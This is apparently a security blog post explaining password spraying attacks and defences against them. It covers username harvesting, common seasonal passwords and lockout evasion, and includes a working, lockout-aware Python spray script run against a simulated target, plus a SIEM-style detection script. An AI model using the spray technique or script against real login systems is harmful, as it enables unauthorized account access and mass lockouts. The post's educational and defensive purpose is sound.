A password spray, or password spraying attack, is one of the most useful items in a penetration tester’s toolbox. This style of attack is used on almost every external and internal penetration test, and if penetration testers are using it, you can be sure that malicious actors are using it as well, so it’s worth understanding what a password spray is and why someone would want to use it. No matter your role, understanding this type of attack can help you become a better network defender, SOC analyst, penetration tester, or security executive, as it highlights some of the associated risks and some of the challenges in detecting and defending against it.
Password Spraying Attack Overview
Traditional password attacks that most people have heard of include brute force attacks and dictionary attacks. In an online attack (you can read more about the difference between online and offline password attacks), these consist of an adversary attempting a large number of different passwords against a single user’s account in an automated fashion until one of them authenticates. That provides unauthorized access to whatever network resource or application is being targeted, which is pretty juicy for an attacker.
A lot of the time, these styles of attack don’t work well anymore. Organizations are reasonably good at defending against them at this point, using account lockouts, IP blacklisting, and logging/alerting on repeated failures against a single account, often enabled by default. That’s where a password spraying attack comes in.
A password spray flips that paradigm: instead of many passwords against one account, the attacker harvests a list of valid (or hopefully valid) user accounts and tries a single common password against all of them. Unfortunately, humans are still bad at choosing passwords in many cases, and this type of attack is still very successful with just a few attempts. Even better for the attacker, a spray sidesteps the classic controls that are tuned to one account failing many times, like account lockouts and per-account alerts, as long as the number of attempts per account stays below the lockout threshold.
How does it work?
Let’s break down how a typical password spraying attack works:
- We need a list of usernames. This can vary in difficulty, but if you’re attacking the external perimeter of an organization, open source intelligence can make it pretty trivial in the age of social media. We might find the username format from an email address on a marketing website (or make educated guesses using standard formats such as first.last or flast). Then we could try to confirm that format via a username enumeration vulnerability on an Internet-facing application, for example a login or password-reset page that responds differently for valid and invalid accounts. Using that information, we could write a script to scrape employee names from LinkedIn and convert them into the appropriate username format. On internal networks, this could be as easy as asking the organization’s Domain Controller for a list of all users: via an anonymous or null session where anonymous enumeration is still allowed, or, on most modern domains, with any low-privileged domain account, since ordinary domain users can read user objects from the directory by default.
- With our crafted user list, we can automate trying one particularly common password against each user. Options like Spring2018, Organization1, or Password1! (the current season or year, the company name, or a well-known default, each tweaked to satisfy complexity rules) are usually a good place to start, and can be adjusted if anything is uncovered about the organization’s password policy. There are many tools, and custom scripts that can be written, to perform this part of the attack depending on what asset or application you are targeting. In most cases, a good intercepting proxy like Burp Suite or a custom curl script will do the trick. The one thing the script must respect is the target’s lockout policy: the number of passwords tried per account within each lockout observation window has to stay below the lockout threshold.
- Based on the responses, we can see which sets of credentials authenticated successfully. We can then take those valid credentials and log in to externally facing assets just like any normal corporate user would, gaining access to the VPN, email, or applications.
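The three steps above, carried through as an added example (this is not the original post’s tooling): it derives usernames from a list of names, then sprays a short password list in rounds sized to stay under a Windows-style lockout policy. The actual login request is a pluggable `attempt(user, password)` callable; a real run would wire that to an HTTP request against the target, but here it is wired to a simulated endpoint with a hypothetical lockout policy so the example runs offline. The names, passwords, usernames and policy values are all constructed for the example.

```python
"""Lockout-aware password spray planner (added example, not the original post's code).
Usernames are derived from 'First Last' names; passwords are sprayed in rounds that
stay under a lockout threshold, pausing for the observation window between rounds.
The target here is a simulation so the whole thing runs offline."""
from datetime import datetime, timedelta

# Constructed sample data: hypothetical people, passwords and policy.
NAMES = ["Alice Adams", "Bob Baker", "Carol Chen", "Dan Diaz"]
PASSWORDS = ["Spring2018", "Organization1", "Password1!", "Summer2018", "Welcome1"]
TRUE_CREDS = {"bob.baker": "Spring2018", "dan.diaz": "Welcome1"}  # only the target knows these


def make_usernames(names, fmt="{first}.{last}"):
    """Turn 'First Last' names into the organization's username format.
    Placeholders: {first}, {last}, {f} (first initial), {l} (last initial)."""
    users = []
    for name in names:
        first, last = name.lower().split()
        users.append(fmt.format(first=first, last=last, f=first[0], l=last[0]))
    return users


class FakeClock:
    """Replaces time.sleep so the observation window passes instantly in the demo."""
    def __init__(self):
        self.now = datetime(2018, 4, 2, 9, 0, 0)

    def sleep(self, seconds):
        self.now += timedelta(seconds=seconds)


class SimulatedTarget:
    """Stand-in for the real login endpoint: `threshold` bad passwords within
    `window` locks the account, after which even the right password fails."""
    def __init__(self, creds, threshold, window, clock):
        self.creds, self.threshold, self.window, self.clock = creds, threshold, window, clock
        self.failures = {}   # user -> timestamps of bad passwords still inside the window
        self.locked = set()

    def login(self, user, password):
        now = self.clock.now
        recent = [t for t in self.failures.get(user, []) if now - t < self.window]
        self.failures[user] = recent          # expired failures no longer count
        if user in self.locked:
            return False
        if self.creds.get(user) == password:
            return True
        recent.append(now)
        if len(recent) >= self.threshold:
            self.locked.add(user)
        return False


def spray(users, passwords, attempt, lockout_threshold, observation_window, sleep):
    """Try each password against every user, at most lockout_threshold-1 passwords
    per account per observation window, sleeping between rounds so the target's
    bad-password counters reset. Returns {user: password} for successful logins."""
    per_round = max(1, lockout_threshold - 1)
    found = {}
    for start in range(0, len(passwords), per_round):
        if start:
            sleep(observation_window.total_seconds())
        for password in passwords[start:start + per_round]:
            for user in users:
                if user in found:             # don't burn attempts on a solved account
                    continue
                if attempt(user, password):
                    found[user] = password
    return found


def demo(policy_threshold=5, planner_threshold=5, window=timedelta(minutes=30)):
    """Spray the simulated target. policy_threshold is the target's real lockout
    threshold; planner_threshold is what the attacker believes it to be.
    Returns (credentials found, accounts locked out)."""
    clock = FakeClock()
    target = SimulatedTarget(TRUE_CREDS, policy_threshold, window, clock)
    found = spray(make_usernames(NAMES), PASSWORDS, target.login,
                  planner_threshold, window, clock.sleep)
    return found, sorted(target.locked)


if __name__ == "__main__":
    print("policy known   :", demo(5, 5))   # both weak accounts found, nothing locked
    print("policy guessed :", demo(3, 6))   # one round, no pause: three accounts locked
```

The second demo call is the failure mode worth remembering: if the planner overestimates the lockout threshold, the spray locks out most of the user base in one pass, which is both noisy and disruptive. In practice the threshold and observation window are read from the domain policy once any foothold exists, and guessed conservatively (one or two passwords per round, hours between rounds) before that.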
What are the Advantages of a Password Spray?
For an attacker or penetration tester, this style of attack is incredibly useful and preys on employees’ inability to pick a strong password and an organization’s failure to enforce a strong password policy or use multi-factor authentication. In addition to these environmental factors, a password spraying attack avoids:
- Account Lockouts – Because you’re trying one password against many accounts, and waiting for the lockout observation window to expire before trying the next password, you will rarely lock out an account. The attacker does need to know, or conservatively guess, the lockout threshold and observation window; getting it wrong locks out a large part of the user base at once, which is noisy and disruptive.
- IPS/IP Blacklisting – Many controls that blacklist an IP address after failed logins only count unsuccessful attempts that share the same username parameter, so as not to block normal application traffic. One failure per account never reaches that threshold.
- SIEM Alerts – Just like IP blacklisting, most SIEM content and SOC playbooks look for many failures against one account by default. Unless the rules have been customized to count distinct accounts per source, a password spray will usually not trigger password attack detection.
What’s the Fix?
This is a scenario where you can’t stop someone from performing a password spray against your organization, but you can significantly reduce its chances of success and make sure you are alerted when it happens. Some things to consider are:
- Reduce your external attack surface – This almost always applies, but it’s a great first step to limit the number of interfaces you have to defend. Have users VPN into the network before accessing any corporate systems whenever possible, so the VPN gateway, rather than every application, is the login surface you have to harden. You can also try to make it harder for an attacker to obtain a list of usernames (which is really hard with the amount of information available online), and make sure you test for username enumeration during regular security assessments.
- Multi-factor authentication – When you’ve got only what is necessary on your perimeter, protect it with MFA! Seriously, use MFA. The importance of this control can’t be overstated, and it is becoming more widely used, easier to implement, and cheaper for organizations. Make sure it covers every external login path, since a sprayed password is still fully valid against any interface that accepts it without a second factor.
- Strong password policies – 8 characters just isn’t sufficient in most cases. Start increasing your organization’s password requirements and use security awareness training to help employees pick strong passwords or passphrases. For Active Directory and employee applications, you can run regular password audits, implement password blacklisting so users cannot choose the most common passwords (the season-plus-year and company-name patterns that sprays start with), and increase the minimum length requirement.
- Finally, with all these preventive controls in place, you can also up your monitoring game. Make sure your SIEM has alerts that can identify this type of attack by auditing for failed login attempts from a single source host against many different user accounts in a short window, rather than only many failures against one account. A successful login from a source that has just failed against dozens of other accounts deserves an immediate alert, since that is what a working spray looks like.
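The monitoring rule from the last bullet, as an added example that is not part of the original post: it counts distinct accounts failing from one source in a sliding window (the spray signature) and reports any account that source then logged in to, alongside the classic per-account brute force rule, so you can see that the per-account rule alone never fires on the spraying source. The log format is a constructed “timestamp user src_ip result” line, not any real product’s schema, and the sample log lines and addresses are made up for the example; mapping it onto real data means pointing `parse` at your failed/successful logon events with the source address and target account fields.

```python
"""Password spray detection over authentication logs (added example, not the
original post's code). Flags sources that fail against many *distinct* accounts,
and contrasts that with the classic many-failures-for-one-account rule."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data): one spray source that also gets one hit,
# one user making a couple of typos, and one classic single-account brute force.
SAMPLE_LOG = """\
2018-04-02T09:00:01 alice.adams 203.0.113.7 FAIL
2018-04-02T09:00:03 bob.baker 203.0.113.7 FAIL
2018-04-02T09:00:05 carol.chen 203.0.113.7 FAIL
2018-04-02T09:00:07 dan.diaz 203.0.113.7 FAIL
2018-04-02T09:00:09 erin.evans 203.0.113.7 FAIL
2018-04-02T09:00:11 frank.ford 203.0.113.7 SUCCESS
2018-04-02T09:00:13 gina.gray 203.0.113.7 FAIL
2018-04-02T09:01:00 alice.adams 198.51.100.9 FAIL
2018-04-02T09:01:20 alice.adams 198.51.100.9 FAIL
2018-04-02T09:01:40 alice.adams 198.51.100.9 SUCCESS
2018-04-02T09:02:00 bob.baker 192.0.2.5 FAIL
2018-04-02T09:02:01 bob.baker 192.0.2.5 FAIL
2018-04-02T09:02:02 bob.baker 192.0.2.5 FAIL
2018-04-02T09:02:03 bob.baker 192.0.2.5 FAIL
2018-04-02T09:02:04 bob.baker 192.0.2.5 FAIL
"""


def parse(log):
    """Yield (timestamp, user, src_ip, result) for each non-empty line."""
    for line in log.splitlines():
        if line.strip():
            ts, user, ip, result = line.split()
            yield datetime.fromisoformat(ts), user, ip, result


def detect_spray(log, window=timedelta(minutes=10), min_users=5):
    """Alert on any source that fails against >= min_users distinct accounts
    within `window`. The alert also lists accounts that source logged in to,
    because a success in the middle of a spray is a probable compromise."""
    failures, successes = defaultdict(list), defaultdict(set)
    for ts, user, ip, result in parse(log):
        if result == "FAIL":
            failures[ip].append((ts, user))
        else:
            successes[ip].add(user)
    alerts = {}
    for ip, events in failures.items():
        events.sort()
        for i, (t0, _) in enumerate(events):          # slide the window over each start
            users = {u for t, u in events[i:] if t - t0 <= window}
            if len(users) >= min_users:
                alerts[ip] = {"users": sorted(users), "successes": sorted(successes[ip])}
                break
    return alerts


def detect_bruteforce(log, window=timedelta(minutes=10), min_failures=5):
    """Classic rule: >= min_failures against the *same* account from one source.
    Returns sorted (src_ip, user) pairs."""
    failures = defaultdict(list)
    for ts, user, ip, result in parse(log):
        if result == "FAIL":
            failures[(ip, user)].append(ts)
    hits = []
    for key, times in failures.items():
        times.sort()
        if any(sum(1 for t in times[i:] if t - t0 <= window) >= min_failures
               for i, t0 in enumerate(times)):
            hits.append(key)
    return sorted(hits)


if __name__ == "__main__":
    print("spray sources:", detect_spray(SAMPLE_LOG))
    print("brute force  :", detect_bruteforce(SAMPLE_LOG))
```

The spraying source fails only once per account, so the per-account rule never reaches its threshold on it; the distinct-account count is what catches it, and the `successes` field is the account the responder should treat as compromised first. Tune `min_users` to the normal fan-out of your authentication sources (a proxy or VPN concentrator will legitimately front many users), and key on the username too where sprays rotate source addresses.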
Password spraying attacks are still a really common vector for gaining access to a corporate network from the Internet, or an initial foothold from within an organization. Knowing that these attacks are possible is half the battle, but many of the fixes noted above are really difficult for organizations to implement, whether because of resource or cultural constraints. A lot of the time, having a penetration test conducted can be a great way to see how susceptible you are to this kind of attack, and the results can help convey to executives the importance of these foundational security controls.